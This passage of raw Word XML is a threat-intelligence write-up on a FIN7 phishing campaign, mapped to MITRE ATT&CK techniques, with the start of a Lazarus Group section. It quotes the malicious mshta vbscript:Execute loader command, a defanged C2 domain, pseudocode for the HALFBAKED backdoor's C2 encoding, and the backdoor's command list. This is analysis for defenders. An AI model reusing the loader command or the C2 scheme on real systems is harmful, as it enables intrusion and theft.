        <w:proofErr w:type="spellEnd"/>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve"> Alerts - Hacker News</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5466D119" w14:textId="07708A32" w:rsidR="00610BF4" w:rsidRDefault="00610BF4" w:rsidP="00065ED3"/>
    <w:p w14:paraId="0372590A" w14:textId="77777777" w:rsidR="00610BF4" w:rsidRDefault="00610BF4" w:rsidP="00065ED3"/>
    <w:p w14:paraId="1BDFD397" w14:textId="5DDAA518" w:rsidR="00E40ABC" w:rsidRDefault="00610BF4" w:rsidP="00065ED3">
      <w:r>
        <w:t xml:space="preserve">[1] </w:t>
      </w:r>
      <w:r w:rsidRPr="00610BF4">
        <w:t>FIN7 is a financially-motivated threat group that has been associated with malicious operations dating back to late 2015. FIN7 is referred to by many vendors as “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00610BF4">
        <w:t>Carbanak</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00610BF4">
        <w:t xml:space="preserve"> Group”, although we do not equate all usage of the CARBANAK backdoor with FIN7. FireEye recently observed a FIN7 spear phishing campaign targeting personnel involved with United States Securities and Exchange Commission (SEC) filings at various organizations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27FC7E89" w14:textId="7A5DE97F" w:rsidR="0062740D" w:rsidRDefault="0062740D" w:rsidP="00065ED3">
      <w:r>
        <w:t xml:space="preserve">[1] </w:t>
      </w:r>
      <w:r w:rsidRPr="0062740D">
        <w:t>In a newly-identified campaign, FIN7 modified their phishing techniques to implement unique infection and persistence mechanisms. FIN7 has moved away from weaponized Microsoft Office macros in order to evade detection. This round of FIN7 phishing lures implements hidden shortcut files (LNK files) to initiate the infection and VBScript functionality launched by mshta.exe to infect the victim.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">( </w:t>
      </w:r>
      <w:r w:rsidRPr="0062740D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>T1566.001</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0062740D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> : </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0062740D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Spearphishing</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0062740D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Attachment T1204.002 : User Execution : Malicious File </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FD3A877" w14:textId="02E3E44D" w:rsidR="00454F19" w:rsidRDefault="00454F19" w:rsidP="00065ED3">
      <w:r>
        <w:t xml:space="preserve">[1] </w:t>
      </w:r>
      <w:r w:rsidRPr="00454F19">
        <w:t>In this ongoing campaign, FIN7 is targeting organizations with spear phishing emails containing either a malicious DOCX or RTF file – two versions of the same LNK file and VBScript technique. These lures originate from external email addresses that the attacker rarely re-used, and they were sent to various locations of large restaurant chains, hospitality, and financial service organizations. The subjects and attachments were themed as complaints, catering orders, or resumes. As with previous campaigns, and as highlighted in our annual M-Trends 2017 report, FIN7 is calling stores at targeted organizations to ensure they received the email and attempting to walk them through the infection process.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BBA0A1A" w14:textId="3D1D07AC" w:rsidR="00454F19" w:rsidRDefault="00454F19" w:rsidP="00065ED3">
      <w:r>
        <w:t>[1] I</w:t>
      </w:r>
      <w:r w:rsidRPr="00454F19">
        <w:t>n the current lures, both the malicious DOCX and RTF attempt to convince the user to double-click on the image in the document, as seen in Figure 1. This spawns the hidden embedded malicious LNK file in the document. Overall, this is a more effective phishing tactic since the malicious content is embedded in the document content rather than packaged in the OLE object.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DBC1E10" w14:textId="26288359" w:rsidR="00454F19" w:rsidRDefault="00454F19" w:rsidP="00454F19">
      <w:r>
        <w:t xml:space="preserve">[1] The malicious LNK launches “mshta.exe” with the following arguments passed to it: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>vbscript:Execute</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">("On Error Resume </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Next:set</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> w=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>GetObject</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(,""</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Word.Application</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">""):execute </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>w.ActiveDocument.Shapes</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(2).</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>TextFrame.TextRange.Text:close</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B43B9E8" w14:textId="407F207E" w:rsidR="00454F19" w:rsidRDefault="00454F19" w:rsidP="00454F19">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00454F19">
        <w:t>Mshta.exe is a utility that executes Microsoft HTML Applications (HTA) files. HTAs are standalone applications that execute using the same models and technologies of Internet Explorer, but outside of the browser.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="680E4DD3" w14:textId="2BAF16CF" w:rsidR="00454F19" w:rsidRDefault="0094116E" w:rsidP="00454F19">
      <w:r>
        <w:t xml:space="preserve">[1] </w:t>
      </w:r>
      <w:r w:rsidRPr="0094116E">
        <w:t>The combined script from Word textbox drops the following components:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="770AD88A" w14:textId="5565F982" w:rsidR="0094116E" w:rsidRDefault="0094116E" w:rsidP="0094116E">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="0094116E">
        <w:t xml:space="preserve">The dropped script “58d2a83f7778d5.36783181.vbs” acts as a launcher. </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="005A37A5" w:rsidRPr="00DF1D2D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>T1059.005 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="005A37A5" w:rsidRPr="00DF1D2D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Command and Scripting Interpreter&gt;:Visual Basic</w:t>
      </w:r>
      <w:r w:rsidR="005A37A5" w:rsidRPr="0094116E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0094116E">
        <w:t>This VBScript checks if the “58d2a83f777942.26535794.ps1” PowerShell script is running using WMI queries and, if not, launches it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7502AA08" w14:textId="77777777" w:rsidR="005A37A5" w:rsidRPr="00DF1D2D" w:rsidRDefault="005A37A5" w:rsidP="005A37A5">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">“58d2a83f777942.26535794.ps1” is a multilayer obfuscated PowerShell script, which launches shellcode for a Cobalt Strike stager. </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00DF1D2D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>T1059.003 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00DF1D2D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Command and Scripting Interpreter&gt;:Windows Command Shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60E33A29" w14:textId="2E53072C" w:rsidR="005A37A5" w:rsidRDefault="005A37A5" w:rsidP="005A37A5">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r>
        <w:t>The shellcode retrieves an additional payload by connecting to the following C2 server using DNS:</w:t>
      </w:r>
      <w:r w:rsidRPr="005A37A5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DF1D2D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00DF1D2D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1105 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00DF1D2D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Ingress Tool Transfer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FCF4D82" w14:textId="073103FC" w:rsidR="005A37A5" w:rsidRDefault="005A37A5" w:rsidP="005A37A5">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>aaa.stage</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>.14919005.www1.proslr3[.]com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F990E17" w14:textId="5C59AB99" w:rsidR="0094116E" w:rsidRDefault="005A37A5" w:rsidP="005A37A5">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>Once a successful reply is received from the command and control (C2) server, the PowerShell script executes the embedded Cobalt Strike shellcode. If unable to contact the C2 server initially, the shellcode is configured to reattempt communication with the C2 server address in the following pattern:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C0CEB24" w14:textId="54094929" w:rsidR="00775147" w:rsidRDefault="00775147" w:rsidP="00775147">
      <w:r>
        <w:t>[1] “mshta.exe” further executes the second VBScript “58d2a83f777908.23270411.vbs”, which creates a folder by GUID name inside “Intel” and drops the VBScript payloads and configuration files:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="771905AA" w14:textId="03488097" w:rsidR="00775147" w:rsidRDefault="00775147" w:rsidP="00775147">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>This script then executes “58d2a83f777716.48248237.vbs”, which is a variant of FIN7’s HALFBAKED backdoor.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77F7A779" w14:textId="603E71E5" w:rsidR="001F3E7C" w:rsidRDefault="001F3E7C" w:rsidP="001F3E7C">
      <w:r>
        <w:t>[1] All communication between the backdoor and attacker C2 are encoded using the following technique, represented in pseudo code:</w:t>
      </w:r>
      <w:r w:rsidR="00F103B9">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00F103B9">
        <w:t xml:space="preserve">( </w:t>
      </w:r>
      <w:r w:rsidR="00F103B9" w:rsidRPr="00F103B9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00F103B9" w:rsidRPr="00F103B9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1132 Data Encoding</w:t>
      </w:r>
      <w:r w:rsidR="00F103B9">
        <w:t xml:space="preserve"> )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72E0CB35" w14:textId="77777777" w:rsidR="001F3E7C" w:rsidRDefault="001F3E7C" w:rsidP="001F3E7C">
      <w:pPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Function </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>send</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>_data</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(data)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34E0B301" w14:textId="77777777" w:rsidR="001F3E7C" w:rsidRDefault="001F3E7C" w:rsidP="001F3E7C">
      <w:pPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>random_string</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>custom_function_to_generate_random_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>string</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B4005DB" w14:textId="77777777" w:rsidR="001F3E7C" w:rsidRDefault="001F3E7C" w:rsidP="001F3E7C">
      <w:pPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>encoded_data</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>URLEncode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>SimpleEncrypt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(data))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="522D69E4" w14:textId="77777777" w:rsidR="001F3E7C" w:rsidRDefault="001F3E7C" w:rsidP="001F3E7C">
      <w:pPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>post_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>data</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">"POST”, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>random_string</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> &amp; "=" &amp; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>encoded_data</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, Hard_coded_c2_url,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="496C2C73" w14:textId="2E747D3C" w:rsidR="002D4E96" w:rsidRDefault="001F3E7C" w:rsidP="002D4E96">
      <w:pPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Create_Random_Url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>class_id</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45F5432F" w14:textId="33A6EC5A" w:rsidR="002D4E96" w:rsidRDefault="002D4E96" w:rsidP="00031861">
      <w:r>
        <w:t xml:space="preserve">[1] </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4E96">
        <w:t>Figure 3 shows that for persistence, the document creates two scheduled tasks and creates one auto-start registry entry pointing to the LNK file.</w:t>
      </w:r>
      <w:r w:rsidR="00031861">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00031861" w:rsidRPr="00031861">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>T1547.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00031861" w:rsidRPr="00031861">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Boot or Logon </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00031861" w:rsidRPr="00031861">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Autostart</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00031861" w:rsidRPr="00031861">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Execution&gt;:Registry Run Keys / Startup Folder </w:t>
      </w:r>
      <w:r w:rsidR="00031861">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">          </w:t>
      </w:r>
      <w:r w:rsidR="00031861" w:rsidRPr="00031861">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>T1053.005 : &lt;Scheduled Task/Job&gt;:Scheduled Task</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="793DFBD0" w14:textId="64E3B97A" w:rsidR="000D6859" w:rsidRDefault="000D6859" w:rsidP="000D6859">
      <w:r>
        <w:t xml:space="preserve">[1] The HALFBAKED malware family consists of multiple components designed to establish and maintain a foothold in victim networks, with the ultimate goal of gaining access to sensitive financial information. This version of </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59F249C1" w14:textId="77777777" w:rsidR="000D6859" w:rsidRDefault="000D6859" w:rsidP="000D6859">
      <w:r>
        <w:t>This version of HALFBAKED listens for the following commands from the C2 server:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F04603B" w14:textId="77777777" w:rsidR="000D6859" w:rsidRDefault="000D6859" w:rsidP="000D6859"/>
    <w:p w14:paraId="25EC9F96" w14:textId="5804380D" w:rsidR="000D6859" w:rsidRDefault="000D6859" w:rsidP="000D6859">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>info: Sends victim machine information (OS, Processor, BIOS and running processes) using WMI queries</w:t>
      </w:r>
      <w:r w:rsidR="00031861">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00031861" w:rsidRPr="00031861">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>T1082 System Information Discovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01B30368" w14:textId="72D176C9" w:rsidR="000D6859" w:rsidRDefault="000D6859" w:rsidP="000D6859">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>processList</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>: Send list of process running</w:t>
      </w:r>
      <w:r w:rsidR="001F4435">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001F4435" w:rsidRPr="001F4435">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>T1057 Process Discovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B964BF3" w14:textId="1BF09758" w:rsidR="000D6859" w:rsidRPr="001F4435" w:rsidRDefault="000D6859" w:rsidP="000D6859">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>screenshot: Takes screen shot of victim machine (using 58d2a83f777688.78384945.ps1)</w:t>
      </w:r>
      <w:r w:rsidR="001F4435">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001F4435" w:rsidRPr="001F4435">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="001F4435" w:rsidRPr="001F4435">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1113 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="001F4435" w:rsidRPr="001F4435">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Screen Capture</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FEC98B2" w14:textId="77777777" w:rsidR="000D6859" w:rsidRDefault="000D6859" w:rsidP="000D6859">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>runvbs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>: Executes a VB script</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12AAD955" w14:textId="77777777" w:rsidR="000D6859" w:rsidRDefault="000D6859" w:rsidP="000D6859">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>runexe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>: Executes EXE file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F603E3D" w14:textId="77777777" w:rsidR="000D6859" w:rsidRDefault="000D6859" w:rsidP="000D6859">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>runps1: Executes PowerShell script</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A407204" w14:textId="77777777" w:rsidR="000D6859" w:rsidRDefault="000D6859" w:rsidP="000D6859">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>delete: Delete the specified file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EE2EE91" w14:textId="4562E4B6" w:rsidR="000D6859" w:rsidRDefault="000D6859" w:rsidP="000D6859">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>update: Update the specified file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B6B58A2" w14:textId="77777777" w:rsidR="00E40ABC" w:rsidRDefault="00E40ABC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:color w:val="1F3763" w:themeColor="accent1" w:themeShade="7F"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="623FDEBA" w14:textId="414A1CFF" w:rsidR="00C37023" w:rsidRDefault="00C37023" w:rsidP="00C37023">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="107" w:name="_Toc153480882"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Lazarus</w:t>
      </w:r>
      <w:r w:rsidR="002618BA">
        <w:t xml:space="preserve"> Group</w:t>
      </w:r>
      <w:bookmarkEnd w:id="107"/>
    </w:p>
    <w:p w14:paraId="47508061" w14:textId="77777777" w:rsidR="00C37023" w:rsidRPr="005B4630" w:rsidRDefault="00C37023" w:rsidP="00C37023">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:bookmarkStart w:id="108" w:name="_Toc153480883"/>
      <w:r>
        <w:t>ATT&amp;CK Technique Summary</w:t>
      </w:r>
      <w:bookmarkEnd w:id="108"/>
    </w:p>
    <w:p w14:paraId="57F3176F"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 xml:space="preserve">The Group </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B1289F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>TechChain</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B1289F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> for G0032 - Lazarus Group is </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23D6D67E"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The Group ATT&amp;CK attribution is Unknown</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03EF5919"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The Group TCERT attribution is KP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1039C5D6"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0043 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B1289F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Reconnaissance ['T1591', 'T1591.004', 'T1593.001', 'T1589.002']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13676D99"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1591 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B1289F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Gather Victim Org Information</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01E44BAC"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T1591.004 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B1289F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Gather Victim Org Information&gt;:Identify Roles</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E37A4BB"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T1593.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B1289F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Search Open Websites/Domains&gt;:Social Media</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27B769F6"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T1589.002 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B1289F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
